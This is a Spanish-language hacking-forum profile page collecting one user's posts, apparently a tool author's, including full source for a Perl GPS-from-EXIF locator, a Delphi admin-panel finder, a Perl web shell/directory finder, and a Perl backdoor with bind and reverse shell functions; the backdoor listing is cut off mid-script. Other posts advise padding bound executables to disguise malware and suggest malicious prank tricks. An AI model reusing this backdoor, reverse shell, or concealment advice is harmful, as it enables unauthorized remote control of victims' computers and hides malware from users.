Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.

Mensajes - BigBear

Páginas: [1] 2 3 ... 28

Noticias Informáticas / Re:FBI Arresta al creador de Nanocore RAT

« en: Abril 05, 2017, 08:59:25 am »

Espero que no sea el mismo aeonhack que hizo los skins de C# que publique en este mismo foro.

C# - VB.NET / Re:JokeManager - Asusta a tus amigos, apagales el ordenador...

« en: Abril 02, 2017, 04:33:51 pm »

Buen aporte, yo hice un generador de virus en Delphi y te puedo pasar algunas ideas, podes agregarle una opcion para volver loca la hora y el mouse con threads para que no deje de cambiarse, si sos perverso podes cambiarle el fondo y el screensaver por cosas desagradables y bloquearlas desde el registro de windows para que no pueda cambiarlas, bueno son muchas cosas, todo esta en la imaginación, la mala imaginación ...

Perl / Re:[Perl] DH Image Locate 0.3

« en: Marzo 31, 2017, 06:06:36 pm »

Ok, gracias por comentar Antrax.

Saludos.

Perl / [Perl] DH Image Locate 0.3

« en: Marzo 31, 2017, 04:25:50 pm »

Un script en Perl para localizar la coordenadas GPS de cualquier imagen que contenga este tag.

Si quieren el programa les redirige a google maps con las coordenadas encontradas.

El codigo :

Código: Perl

#!usr/bin/perl
# DH Image Locate 0.3
#(C) Doddy Hackman 2016
 
use Image::ExifTool;
use Getopt::Long;
use Color::Output;
Color::Output::Init;
 
GetOptions(
    "dump_all=s"   => \$dump_all,
    "dump_gps_tags=s"  => \$dump_gps_tags,
    "locate=s"   => \$locate
);
 
head();
 
if ($dump_all) {
 
    if ( -f $dump_all ) {
        printear_titulo("<ul class="bbc_list"><li type="square"> Finding information in : ");[/li][/list]
        print $dump_all. "\n\n";
        dump_all($dump_all);
    }
    else {
        printear("[-] File not found\n");
    }
 
}
elsif ($dump_gps_tags) {
 
    if ( -f $dump_gps_tags ) {
        printear_titulo("</li><li type="square"> Finding GPS tags in : ");[/li][/list]
        print $dump_gps_tags. "\n\n";
        dump_gps_tags_and_locate($dump_gps_tags,"0");
    }
    else {
        printear("[-] File not found\n");
    }
}
elsif ($locate) {
 
    if ( -f $locate ) {
        printear_titulo("</li><li type="square"> Scanning photo : ");[/li][/list]
        print $locate. "\n\n";
        dump_gps_tags_and_locate($locate,"1");
    }
    else {
        printear("[-] File not found\n");
    }
 
} else {
    sintax();
}
 
copyright();
 
# Functions
 
sub dump_all {
 
    my $imagen_target = $_[0];
 
    my $datos_imagen       = new Image::ExifTool;
    my $informacion_imagen = $datos_imagen->ImageInfo($imagen_target);
 
    for my $abriendo_imagen ( $datos_imagen->GetFoundTags("Group0") ) {
        my $valor = $informacion_imagen->{$abriendo_imagen};
        printear("</li><li type="square"> $abriendo_imagen : ");[/li][/list]
        print $valor. "\n";
    }
 
}
 
sub dump_gps_tags_and_locate {
   
   my $imagen_target = shift;
   my $locate = shift;
 
   my $datos_imagen       = new Image::ExifTool;
   my $informacion_imagen = $datos_imagen->ImageInfo($imagen_target);
 
   my $latitud = $informacion_imagen->{GPSLatitude};
   my $longitud = $informacion_imagen->{GPSLongitude};
   my $altitud = $informacion_imagen->{GPSAltitude};
   my $fecha = $informacion_imagen->{GPSDateTime};
   my $posicion_real = $informacion_imagen->{GPSPosition};
   
   my $finder_ready = 0;
   
   
   if($latitud ne "") {
      printear("</li><li type="square"> Latitude : ");[/li][/list]
      print $latitud. "\n";
   } else {
      printear("[-] Latitude : ");
      print "Not Found". "\n";   
   }
   
   if($longitud ne "") {
      printear("</li><li type="square"> Longitude : ");[/li][/list]
      print $longitud. "\n";
   } else {
      printear("[-] Longitude : ");
      print "Not Found". "\n";
   }
    
    if($latitud ne "") {
      printear("</li><li type="square"> Altitude : ");[/li][/list]
      print $altitud. "\n";
   } else {
      printear("[-] Altitude : ");
      print "Not Found". "\n";
   }
    
    if($fecha ne "") {
      printear("</li><li type="square"> DateTime : ");[/li][/list]
      print $fecha. "\n";
   } else {
      printear("[-] DateTime : ");
      print "Not Found". "\n";
   }
    
    if($posicion_real ne "") {
      printear("</li><li type="square"> Position : ");[/li][/list]
      print $posicion_real. "\n";
      $finder_ready = 1;
   } else {
      printear("[-] Position : ");
      print "Not Found". "\n";
      $finder_ready = 0;
   }
   
   if($locate eq "1") {
      if($finder_ready eq "1") {
         my $gps_split = $posicion_real;
         $gps_split =~ s/deg//g;
         $gps_split =~ s/'//g;
         $gps_split =~ s/"//g;
         $gps_split =~ s/W//g;
         $gps_split =~ s/N,/-/g;
         $gps_split =~ s/  / /g;
                  
         my $url = "[url]https://www.google.com.ar/maps/search/[/url]".$gps_split."/";
         
         printear_titulo("\n[!] Position Located\n\n");
         printear("</li><li type="square"> GPS : ");[/li][/list]
         print $gps_split."\n";
         
         printear("\n[?] Open in browser [y,n] : ");
         chomp(my $rta = <STDIN>);
         if($rta=~/y/ig) {
            printear_titulo("\n</li><li type="square"> Enjoy the program !\n");[/li][/list]
            system("start firefox \"" . $url."\"");
         } else {
            printear("\n</li><li type="square"> GoogleMaps : ");[/li][/list]
            print $url. "\n";
         }
         
      } else {
         printear_titulo("\n[-] Position GPS not available");
      }
   }
   
}
 
# More Functions
 
sub printear {
    cprint( "\x036" . $_[0] . "\x030" );
}
 
sub printear_logo {
    cprint( "\x037" . $_[0] . "\x030" );
}
 
sub printear_titulo {
    cprint( "\x0310" . $_[0] . "\x030" );
}
 
sub sintax {
 
    printear("</li><li type="square"> Sintax : ");[/li][/list]
    print "perl $0 <option> <value>\n";
    printear("\n</li><li type="square"> Options : \n\n");[/li][/list]
    print "-dump_all <image> : Get all information of a image\n";
    print "-dump_gps <image> : Get all tags GPS of a image\n";
    print "-locate <image> : Locate Image in GoogleMaps\n";
    printear("\n</li><li type="square"> Example : ");[/li][/list]
    print "perl dh_image_locate.pl -dump_all test.jpg\n";
    copyright();
}
 
sub head {
    printear_logo("\n-- == DH Image Locate 0.3 == --\n\n\n");
}
 
sub copyright {
    printear_logo("\n\n-- == (C) Doddy Hackman 2016 == --\n\n");
    exit(1);
}
 
#The End ?
 

Un video con ejemplos de uso :

Si quieren bajar el programa lo pueden hacer de aca :

SourceForge.
Github.

Eso seria todo.

Dudas y pedidos generales / Re:[SOLUCIONADO] crear una botnet

« en: Marzo 27, 2017, 10:43:50 pm »

Cita de: NicoFlamel23 en Marzo 26, 2017, 01:01:25 pm

me pueden conseguir el ircplus para poder practicarlo

No hace falta el IRC Plus para probar una IRC Botnet, podes crear un canal que no use nadie en un servidor cualquiera para poder practicar ...

Diseño Gráfico / Re:La bruja de Underc0de.org

« en: Marzo 27, 2017, 03:39:54 pm »

Si, yo preguntaba porque yo hacia animaciones basicas con Adobe Flash CS3, por eso la pregunta, me acuerdo que era todo un tema hacer fotograma por fotograma (en sentido literal) en las animaciones xD.

Diseño Gráfico / Re:La bruja de Underc0de.org

« en: Marzo 26, 2017, 09:24:05 pm »

Ok, entonces la clave es la misma que en el diseño web, la creatividad y otras cosas mas ...

Diseño Gráfico / Re:La bruja de Underc0de.org

« en: Marzo 26, 2017, 03:56:35 pm »

Esta buena, ¿ podrias decirme como lo hiciste ?, yo solo uso Photoshop ...

Debates / Re:WhatsApp compartirá tu ubicación-Adiós a la mentirilla de “voy llegando”

« en: Marzo 24, 2017, 01:02:45 pm »

A mi no me molesta, mientras sea opcional como el dejar rastros gps en las fotos cuando usamos la camara del celular ...

Otros lenguajes / Re:[Cramel] File pumper | Agrega peso a tus archivos

« en: Marzo 23, 2017, 04:19:08 pm »

Cita de: zoro248 en Marzo 23, 2017, 03:56:36 pm

Cita de: Doddy en Marzo 23, 2017, 01:11:29 pm
Cita de: zoro248 en Marzo 22, 2017, 09:19:34 pm
Gracias, aun no se me ocurre en que utilizarlo, pero lo tendre xD

Lo podes usar en un ejecutable bindeado para que tenga el peso original del programa que tratas de imitar cuando ocultas el malware.

Genial, aunque creo ya no sirven los crypters hoy en dia, o si?

ja , ese es todo un tema de debate deberias crear un tema con esa pregunta, yo solo hice uno en Delphi y no me gusto, me parecio una perdida de tiempo ya que no lo logre hacer FUD porque use un Runpe conocido.

Otros lenguajes / Re:[Cramel] File pumper | Agrega peso a tus archivos

« en: Marzo 23, 2017, 01:11:29 pm »

Cita de: zoro248 en Marzo 22, 2017, 09:19:34 pm

Gracias, aun no se me ocurre en que utilizarlo, pero lo tendre xD

Lo podes usar en un ejecutable bindeado para que tenga el peso original del programa que tratas de imitar cuando ocultas el malware.

Debates / Re:Tu entorno linux favorito

« en: Marzo 20, 2017, 11:14:18 am »

Siempre use Gnome en Ubuntu y en ese entonces me parecio suficiente cuando tunee todo el escritorio estilo matrix o tron.

Python / Re:Troyano IRC

« en: Marzo 17, 2017, 06:23:29 pm »

Si se trata de un troyano IRC y buscas ideas entonces revista la lista de funciones de mi IRC Botnet en Delphi : Project Spartacus 2.0 , tu trabajo seria traducir a Python las funciones que te gustan del proyecto.

Saludos.

Off Topic / Re:motivacion

« en: Marzo 08, 2017, 12:18:49 pm »

En mi caso siempre la programacion sobre temas como exploits y malware.

Saludos.

Delphi / [Delphi] Admin Finder 1.0

« en: Febrero 23, 2017, 05:46:31 pm »

Un programa para buscar el panel de administracion usando threads para ser mas rápido y cómodo al usuario.

Una imagen :

El codigo :

Código: Delphi

// Admin Finder 1.0
// (C) Doddy Hackman 2016
 
unit finder;
 
interface
 
uses
  Winapi.Windows, Winapi.Messages, System.SysUtils, System.Variants,
  System.Classes, Vcl.Graphics,
  Vcl.Controls, Vcl.Forms, Vcl.Dialogs, Vcl.ExtCtrls, Vcl.StdCtrls,
  Vcl.ComCtrls, idHTTP, OtlThreadPool, OtlComm, OtlTask,
  OtlTaskControl, Vcl.Imaging.pngimage;
 
type
  TFormHome = class(TForm)
    imgLogo: TImage;
    gbEnterConfiguration: TGroupBox;
    lblPage: TLabel;
    lblThreads: TLabel;
    txtPage: TEdit;
    txtThreads: TEdit;
    udThreads: TUpDown;
    gbConsole: TGroupBox;
    mmOutput: TMemo;
    btnStart: TButton;
    btnStop: TButton;
    status: TStatusBar;
    procedure btnStopClick(Sender: TObject);
    procedure btnStartClick(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;
 
var
  FormHome: TFormHome;
 
implementation
 
{$R *.dfm}
// Functions
 
function message_box(title, message_text, type_message: string): string;
begin
  if not(title = '') and not(message_text = '') and not(type_message = '') then
  begin
    try
      begin
        if (type_message = 'Information') then
        begin
          MessageBox(FormHome.Handle, PChar(message_text), PChar(title),
            MB_ICONINFORMATION);
        end
        else if (type_message = 'Warning') then
        begin
          MessageBox(FormHome.Handle, PChar(message_text), PChar(title),
            MB_ICONWARNING);
        end
        else if (type_message = 'Question') then
        begin
          MessageBox(FormHome.Handle, PChar(message_text), PChar(title),
            MB_ICONQUESTION);
        end
        else if (type_message = 'Error') then
        begin
          MessageBox(FormHome.Handle, PChar(message_text), PChar(title),
            MB_ICONERROR);
        end
        else
        begin
          MessageBox(FormHome.Handle, PChar(message_text), PChar(title),
            MB_ICONINFORMATION);
        end;
        Result := '<ul class="bbc_list"><li type="square"> MessageBox : OK';[/li][/list]
      end;
    except
      begin
        Result := '[-] Error';
      end;
    end;
  end
  else
  begin
    Result := '[-] Error';
  end;
end;
 
function check_page(page: string): boolean;
var
  nave: TIdHTTP;
begin
  try
    begin
      nave := TIdHTTP.Create(nil);
      nave.Request.UserAgent :=
        'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0';
      nave.Get(page);
      if nave.ResponseCode = 200 then
      begin
        Result := True;
      end
      else
      begin
        Result := False;
      end;
      nave.Free();
    end;
  except
    begin
      Result := False;
    end;
  end;
end;
 
//
 
procedure TFormHome.btnStartClick(Sender: TObject);
var
  i: integer;
  path: string;
const
  paths: array [1 .. 250] of string = ('admin/admin.asp', 'admin/login.asp',
    'admin/index.asp', 'admin/admin.aspx', 'admin/login.aspx',
    'admin/index.aspx', 'admin/webmaster.asp', 'admin/webmaster.aspx',
    'asp/admin/index.asp', 'asp/admin/index.aspx', 'asp/admin/admin.asp',
    'asp/admin/admin.aspx', 'asp/admin/webmaster.asp',
    'asp/admin/webmaster.aspx', 'admin/', 'login.asp', 'login.aspx',
    'admin.asp', 'admin.aspx', 'webmaster.aspx', 'webmaster.asp',
    'login/index.asp', 'login/index.aspx', 'login/login.asp',
    'login/login.aspx', 'login/admin.asp', 'login/admin.aspx',
    'administracion/index.asp', 'administracion/index.aspx',
    'administracion/login.asp', 'administracion/login.aspx',
    'administracion/webmaster.asp', 'administracion/webmaster.aspx',
    'administracion/admin.asp', 'administracion/admin.aspx', 'php/admin/',
    'admin/admin.php', 'admin/index.php', 'admin/login.php', 'admin/system.php',
    'admin/ingresar.php', 'admin/administrador.php', 'admin/default.php',
    'administracion/', 'administracion/index.php', 'administracion/login.php',
    'administracion/ingresar.php', 'administracion/admin.php',
    'administration/', 'administration/index.php', 'administration/login.php',
    'administrator/index.php', 'administrator/login.php',
    'administrator/system.php', 'system/', 'system/login.php', 'admin.php',
    'login.php', 'administrador.php', 'administration.php', 'administrator.php',
    'admin1.html', 'admin1.php', 'admin2.php', 'admin2.html', 'yonetim.php',
    'yonetim.html', 'yonetici.php', 'yonetici.html', 'adm/',
    'admin/account.php', 'admin/account.html', 'admin/index.html',
    'admin/login.html', 'admin/home.php', 'admin/controlpanel.html',
    'admin/controlpanel.php', 'admin.html', 'admin/cp.php', 'admin/cp.html',
    'cp.php', 'cp.html', 'administrator/', 'administrator/index.html',
    'administrator/login.html', 'administrator/account.html',
    'administrator/account.php', 'administrator.html', 'login.html',
    'modelsearch/login.php', 'moderator.php', 'moderator.html',
    'moderator/login.php', 'moderator/login.html', 'moderator/admin.php',
    'moderator/admin.html', 'moderator/', 'account.php', 'account.html',
    'controlpanel/', 'controlpanel.php', 'controlpanel.html',
    'admincontrol.php', 'admincontrol.html', 'adminpanel.php',
    'adminpanel.html', 'admin1.asp', 'admin2.asp', 'yonetim.asp',
    'yonetici.asp', 'admin/account.asp', 'admin/home.asp',
    'admin/controlpanel.asp', 'admin/cp.asp', 'cp.asp',
    'administrator/index.asp', 'administrator/login.asp',
    'administrator/account.asp', 'administrator.asp', 'modelsearch/login.asp',
    'moderator.asp', 'moderator/login.asp', 'moderator/admin.asp',
    'account.asp', 'controlpanel.asp', 'admincontrol.asp', 'adminpanel.asp',
    'fileadmin/', 'fileadmin.php', 'fileadmin.asp', 'fileadmin.html',
    'administration.html', 'sysadmin.php', 'sysadmin.html', 'phpmyadmin/',
    'myadmin/', 'sysadmin.asp', 'sysadmin/', 'ur-admin.asp', 'ur-admin.php',
    'ur-admin.html', 'ur-admin/', 'Server.php', 'Server.html', 'Server.asp',
    'Server/', 'wpadmin/', 'administr8.php', 'administr8.html', 'administr8/',
    'administr8.asp', 'webadmin/', 'webadmin.php', 'webadmin.asp',
    'webadmin.html', 'administratie/', 'admins/', 'admins.php', 'admins.asp',
    'admins.html', 'administrivia/', 'Database_Administration/', 'WebAdmin/',
    'useradmin/', 'sysadmins/', 'admin1/', 'systemadministration/',
    'administrators/', 'pgadmin/', 'directadmin/', 'staradmin/',
    'ServerAdministrator/', 'SysAdmin/', 'administer/', 'LiveUser_Admin/',
    'sysadmin/', 'typo3/', 'panel/', 'cpanel/', 'cPanel/', 'cpanel_file/',
    'platz_login/', 'rcLogin/', 'blogindex/', 'formslogin/', 'autologin/',
    'support_login/', 'meta_login/', 'manuallogin/', 'simpleLogin/',
    'loginflat/', 'utility_login/', 'showlogin/', 'memlogin/', 'members/',
    'login-redirect/', 'sublogin/', 'wplogin/', 'login1/', 'dirlogin/',
    'login_db/', 'xlogin/', 'smblogin/', 'customer_login/', 'UserLogin/',
    'loginus/', 'acct_login/', 'admin_area/', 'bigadmin/', 'project-admins/',
    'phppgadmin/', 'pureadmin/', 'sqladmin/', 'radmind/', 'openvpnadmin/',
    'wizmysqladmin/', 'vadmind/', 'ezsqliteadmin/', 'hpwebjetadmin/',
    'newsadmin/', 'adminpro/', 'Lotus_Domino_Admin/', 'bbadmin/', 'vmailadmin/',
    'Indy_admin/', 'ccp14admin/', 'irc-macadmin/', 'banneradmin/', 'sshadmin/',
    'phpldapadmin/', 'macadmin/', 'administratoraccounts/', 'admin4_account/',
    'admin4_colon/', 'radmind1/', 'SuperAdmin/', 'AdminTools/', 'cmsadmin/',
    'SysAdmin2/', 'globes_admin/', 'cadmins/', 'phpSQLiteAdmin/',
    'navSiteAdmin/', 'server_admin_small/', 'logo_sysadmin/', 'server/',
    'database_administration/', 'power_user/', 'system_administration/',
    'ss_vms_admin_sm/');
begin
  if not(txtPage.Text = '') and not(txtThreads.Text = '') then
  begin
    GlobalOmniThreadPool.MaxExecuting := StrToInt(txtThreads.Text) *
      System.CPUCount;
    status.Panels[0].Text := '</li><li type="square"> Scanning ...';[/li][/list]
    FormHome.Update;
    for i := Low(paths) to High(paths) do
    begin
      Application.ProcessMessages;
      path := txtPage.Text + '/' + paths[i];
      CreateTask(
        procedure(const task: IOmniTask)
        var
          path_to_load: string;
        begin
 
          path_to_load := task.Param['path'].AsString;
 
          status.Panels[0].Text := 'Checking : ' + path_to_load + ' ...';
          FormHome.Update;
          if (check_page(path_to_load)) then
          begin
            mmOutput.Lines.Add(path_to_load);
          end;
 
        end).SetParameter('path', path).Unobserved.Schedule;
 
    end;
 
    while GlobalOmniThreadPool.CountExecuting +
      GlobalOmniThreadPool.CountQueued > 0 do
    begin
      Application.ProcessMessages;
    end;
 
    status.Panels[0].Text := '</li><li type="square"> Finished';[/li][/list]
    FormHome.Update;
 
    message_box('Admin Finder 1.0', 'Scan Finished', 'Information');
 
  end
  else
  begin
    message_box('Admin Finder 1.0', 'Complete the configuration', 'Warning');
  end;
end;
 
procedure TFormHome.btnStopClick(Sender: TObject);
begin
  GlobalOmniThreadPool.CancelAll;
  status.Panels[0].Text := '</li><li type="square"> Stopped';[/li][/list]
  FormHome.Update;
  message_box('Admin Finder 1.0', 'Scan Stopped', 'Information');
end;
 
end.
 
// The End ?
 

Si quieren bajar el programa y el proyecto con el codigo fuente lo pueden hacer desde aca :

SourceForge.

Eso seria todo.

Java / Re:[Java] BotIrc

« en: Febrero 10, 2017, 05:46:46 pm »

Que onda Moy , los colores del programa me dan nostalgia a un antiguo programa Tk en Perl que hice , la idea esta buena , deberia aplicar la idea en Delphi pero no tengo tiempo xD.

Gracias por el aporte.

Saludos.

Delphi / [Delphi] DH SAMP Cheater 0.4

« en: Febrero 09, 2017, 08:41:15 pm »

Un programa que hice en Delphi para automatizar los comandos cuando juego al GTA San Andreas Online (SAMP) , esta hecho exclusivamente para el servidor UIF.

Simplemente usan el atajo de teclado cuando esten jugando y el comando se ejecutara.

Una imagen :

Si quieren bajar el programa lo pueden hacer de aca :

SourceForge.

Eso seria todo.

Perl / Re:[Perl] DH Secret Finder 0.8

« en: Febrero 09, 2017, 08:40:05 pm »

ok , gracias por comentar JETY.

Perl / [Perl] DH Secret Finder 0.8

« en: Enero 22, 2017, 09:36:42 am »

Un script en Perl que sirve como buscador de archivos web , tiene las siguientes opciones :

Buscar panel de administracion[/li]
Buscar dominios[/li]
Buscar directorios importantes[/li]
Buscar archivos importantes[/li]
Buscar PHP Shells[/li]
Guardar todo en logs[/li][/list]

El codigo :

Código: Perl
1. # !usr/bin/perl
2. # DH Secret Finder 0.8
3. # (C) Doddy Hackman 2016
4. # Credits for the arrays :
5. # Dirs : directory-list-2.3-small.txt - Copyright 2007 James Fisher
6. # Files : Based in wfuzz-1.4
7. # Link for Files : [url]https://raw.githubusercontent.com/tuwid/darkc0de-old-stuff/master/wfuzz-1.4/wordlists/common.txt[/url]
8. # Shells : Based in [url]https://github.com/bhavyanshu/Shell-Finder[/url]
10. use LWP::UserAgent;
11. use Getopt::Long;
12. use Color::Output;
13. Color::Output::Init;
15. GetOptions(
16. "panels" => \$panels,
17. "domains" => \$domains,
18. "dirs" => \$dirs,
19. "files" => \$files,
20. "shells" => \$shells,
21. "url=s" => \$url,
22. "savefile=s" => \$savefile,
23. "verbose" => \$verbose
24. );
26. head();
28. if ($panels) {
29. if($panels && $url) {
30. search($url,"panel");
31. } else {
32. sintax();
33. }
34. }
35. elsif ($domains) {
36. if($domains && $url) {
37. search($url,"domain");
38. } else {
39. sintax();
40. }
41. }
42. elsif ($dirs) {
43. if($dirs && $url) {
44. search($url,"dir");
45. } else {
46. sintax();
47. }
48. }
49. elsif ($files) {
50. if($files && $url) {
51. search($url,"file");
52. } else {
53. sintax();
54. }
55. }
56. elsif ($shells) {
57. if($shells && $url) {
58. search($url,"shell");
59. } else {
60. sintax();
61. }
62. }
63. else {
64. sintax();
65. }
67. copyright();
69. # Functions
71. sub search {
72. my ($url,$type) = @_;
74. my $wordlist = "";
75. my $name = "";
77. if($type eq "panel") {
78. $wordlist = "wordlists/panels.txt";
79. $name = "Panels";
80. } elsif($type eq "domain") {
81. $wordlist = "wordlists/domains.txt";
82. $name = "Domains";
83. } elsif($type eq "dir") {
84. $wordlist = "wordlists/directories.txt";
85. $name = "Directories";
86. } elsif($type eq "file") {
87. $wordlist = "wordlists/files.txt";
88. $name = "Files";
89. } elsif($type eq "shell") {
90. $wordlist = "wordlists/shells.txt";
91. $name = "Shells";
92. } else {
93. $wordlist = "wordlists/panels.txt";
94. $name = "Panels";
95. }
97. my $cantidad = 0;
99. if(-f $wordlist) {
100. printear_titulo("</li><li type="square"> Loading Wordlist ...\n");[/li][/list]
101. my @wordlist = load_wordlist($wordlist);
102. printear("\n</li><li type="square"> Wordlist Loaded : ");[/li][/list]
103. print int(@wordlist)." lines\n";
104. printear_logo("\n</li><li type="square"> Searching $name in $url ...\n\n");[/li][/list]
105. for my $line(@wordlist) {
106. chomp $line;
107. my $link = "";
108. if($type eq "domain") {
109. $link = $line.".".$url;
110. } else {
111. $link = $url."/".$line;
112. }
113. if(check_page($link)) {
114. if($verbose) {
115. printear("</li><li type="square"> Checking ");[/li][/list]
116. printear_logo("$link : ");
117. printear_azul("OK\n");
118. } else {
119. printear_azul("</li><li type="square"> Link : $link\n");[/li][/list]
120. }
121. $cantidad++;
122. if($savefile) {
123. savefile($savefile,"</li><li type="square"> Link : $link");[/li][/list]
124. }
125. } else {
126. if($verbose) {
127. printear("</li><li type="square"> Checking ");[/li][/list]
128. printear_logo("$link : ");
129. printear_rojo("FAIL\n");
130. }
131. }
132. }
133. printear("\n</li><li type="square"> $name Found : ");[/li][/list]
134. print "$cantidad\n";
135. if($cantidad eq "0") {
136. printear("\n[-] $name not found\n");
137. }
138. if($savefile) {
139. printear_logo("\n</li><li type="square"> Logs $savefile saved\n");[/li][/list]
140. }
141. printear_titulo("\n</li><li type="square"> Finished\n");[/li][/list]
142. } else {
143. printear_rojo("\n[-] Wordlist not exists");
144. }
145. }
147. # More Functions
149. sub check_page {
150. my $url = shift;
151. my $nave = LWP::UserAgent->new(ssl_opts => {verify_hostname => 0,SSL_verify_mode => IO::Socket::SSL::SSL_VERIFY_NONE});
152. $nave->agent("Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0");
153. $nave->timeout(10);
154. my $code = $nave->get($url);
155. if ($code->is_success) {
156. return 1;
157. } else {
158. return 0;
159. }
160. }
162. sub load_wordlist {
163. my @result;
164. my @words;
165. open( FILE, $_[0] );
166. @words = <FILE>;
167. close FILE;
168. for (@words) {
169. push( @result, $_ );
170. }
171. return (@result);
172. }
174. sub savefile {
175. my ($filename,$text) = @_;
176. open( SAVE, ">>" . $filename );
177. print SAVE $text . "\n";
178. close SAVE;
179. }
181. sub printear {
182. cprint( "\x036" . $_[0] . "\x030" );
183. }
185. sub printear_logo {
186. cprint( "\x037" . $_[0] . "\x030" );
187. }
189. sub printear_titulo {
190. cprint( "\x0310" . $_[0] . "\x030" );
191. }
193. sub printear_rojo {
194. cprint( "\x035" . $_[0] . "\x030" );
195. }
197. sub printear_azul {
198. cprint( "\x033" . $_[0] . "\x030" );
199. }
201. sub sintax {
202. printear("</li><li type="square"> Sintax : ");[/li][/list]
203. print "perl $0 <option> <value>\n";
204. printear("\n</li><li type="square"> Options : \n\n");[/li][/list]
205. print "-panel -url <url> : Find panel administration in the URL\n";
206. print "-domain -url <url> : Find domains in the URL\n";
207. print "-dirs -url <url> : Find directories in the URL\n";
208. print "-files -url <url> : Find files in the URL\n";
209. print "-shells -url <url> : Find shells in the URL\n";
210. print "-savefile <filename> : Save results\n";
211. printear("\n</li><li type="square"> Example : ");[/li][/list]
212. print "perl secret_finder.pl -shells [url]http://localhost/[/url] -savefile results.txt\n";
213. copyright();
214. }
216. sub head {
217. printear_logo("\n-- == DH Secret Finder 0.8 == --\n\n\n");
218. }
220. sub copyright {
221. printear_logo("\n\n-- == (C) Doddy Hackman 2016 == --\n\n");
222. exit(1);
223. }
225. #The End ?
Si quieren bajar el programa lo pueden hacer de aca :

SourceForge.
Github.

Eso seria todo.

Perl / [Perl] Heaven Door 1.0

« en: Enero 20, 2017, 09:14:38 am »

Un script en Perl que funciona como backdoor con las siguientes opciones :

Backdoor[/li]
Reverse Shell[/li]
Generar backdoor PHP[/li]
Conectar con backdoor PHP[/li][/list]

El codigo :

Código: Perl
1. # !usr/bin/perl
2. # Heaven Door 1.0
3. # (C) Doddy Hackman 2016
5. use LWP::UserAgent;
6. use MIME::Base64;
7. use IO::Socket;
8. use IO::Socket::SSL;
9. use Cwd;
10. use Getopt::Long;
11. use Color::Output;
12. Color::Output::Init;
14. GetOptions(
15. "backdoor" => \$backdoor,
16. "reverse" => \$reverse,
17. "ip=s" => \$ip,
18. "port=s" => \$port,
19. "generate_backdoor" => \$generate_backdoor,
20. "filename=s" => \$filename,
21. "connect_backdoor" => \$connect_backdoor,
22. "url=s" => \$url
23. );
25. head();
27. if ($backdoor) {
28. if($backdoor && $port) {
29. backdoor($port);
30. } else {
31. sintax();
32. }
33. }
34. elsif ($reverse) {
35. if($reverse && $ip && $port) {
36. reverse_shell($ip,$port);
37. } else {
38. sintax();
39. }
40. }
41. elsif ($generate_backdoor) {
42. if($filename) {
43. cargar_generador_backdoor($filename);
44. } else {
45. sintax();
46. }
47. }
48. elsif ($connect_backdoor) {
49. if($url) {
50. cargar_consola_backdoor($url);
51. } else {
52. sintax();
53. }
54. }
55. else {
56. sintax();
57. }
59. copyright();
61. # Functions
63. # Simple backdoor
65. sub backdoor {
67. my($port) = @_;
69. $backdoor = IO::Socket::INET->new(Proto=> 'tcp',LocalPort =>$port,Listen=> SOMAXC,Reuse=> 1);
71. printear("</li><li type="square"> Heaven_Door : ");[/li][/list]
72. print "Online\n";
73. printear("</li><li type="square"> Port : ");[/li][/list]
74. print "$port\n";
75. printear("</li><li type="square"> PID : ");[/li][/list]
76. print "$$\n\n";
78. printear_titulo("</li><li type="square"> Connected");[/li][/list]
80. while ($jesus = $backdoor->accept()) {
81. $jesus->autoflush(1);
82. print $jesus "</li><li type="square"> Heaven_Door : Online\n</li><li type="square"> Port : 25256\n</li><li type="square"> PID : ".$$."\n\n";[/li][/list]
83. print $jesus "Welcome ".$jesus->peerhost."\n\n";
84. &extras;
85. $dir = getcwd();
86. print $jesus $dir.">>";
87. while (<$jesus>) {
88. my $yeah = qx($_);
89. print $jesus "\n\n".$yeah."\n\n";
90. print $jesus $dir.">>";
91. }
92. }
94. sub extras {
96. if ($^O =~/Win32/ig) {
97. use if $^O eq "MSWin32", "Win32";
98. print $jesus "</li><li type="square"> Domain Name : ".Win32::DomainName()."\n";[/li][/list]
99. print $jesus "</li><li type="square"> OS Version : ".Win32::GetOSName()."\n";[/li][/list]
100. print $jesus "</li><li type="square"> Username : ".Win32::LoginName()."\n\n";[/li][/list]
101. } else {
102. $output = `uname -a`;
103. print $jesus "--==System Info==--\n\n".$output."\n";
104. }
105. }
107. }
109. #
111. # Reverse Shell
113. sub reverse_shell {
114. my($ip,$port) = @_;
115. printear_titulo("</li><li type="square"> Reverse Shell : ");[/li][/list]
116. print "Loaded\n\n";
117. printear("</li><li type="square"> IP to connect : ");[/li][/list]
118. print $ip."\n";
119. printear("</li><li type="square"> Port : ");[/li][/list]
120. print $port."\n\n";
121. printear_logo("</li><li type="square"> Connecting ...\n\n");[/li][/list]
122. socket(REVERSE, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
123. connect(REVERSE, sockaddr_in($port,inet_aton($ip)));
124. printear_titulo("</li><li type="square"> Reverse Shell successful\n\n");[/li][/list]
125. open (STDIN,">&REVERSE");
126. open (STDOUT,">&REVERSE");
127. open (STDERR,">&REVERSE");
128. tipo();
129. printear_logo("</li><li type="square"> Disconnecting ...\n\n");[/li][/list]
130. }
132. sub tipo {
133. if ($^O =~/Win32/ig) {
134. infowin();
135. system("cmd.exe");
136. } else {
137. infolinux();
138. system("export TERM=xterm;exec sh -i");
139. }
140. }
142. sub infowin {
143. use if $^O eq "MSWin32", "Win32";
144. print "</li><li type="square"> Domain Name : ".Win32::DomainName()."\n";[/li][/list]
145. print "</li><li type="square"> OS Version : ".Win32::GetOSName()."\n";[/li][/list]
146. print "</li><li type="square"> Username : ".Win32::LoginName()."\n\n";[/li][/list]
147. }
149. sub infolinux {
150. print "</li><li type="square"> System information\n\n";[/li][/list]
151. system("uname -a");
152. print "\n";
153. }
155. #
157. # More Functions
159. sub cargar_consola_backdoor {
160. printear("</li><li type="square"> Checking Backdoor ...\n\n");[/li][/list]
161. my $check1 = cargar_comando($url,"ver");
162. my $check2 = cargar_comando($url,"uname -a");
163. if(check_backdoor($check1) or check_backdoor($check2)) {
164. printear_logo("</li><li type="square"> Backdoor Loaded\n");[/li][/list]
165. my($url) = @_;
166. while(1) {
167. printear("\n</li><li type="square"> Command : ");[/li][/list]
168. chomp( my $comando = <stdin> );
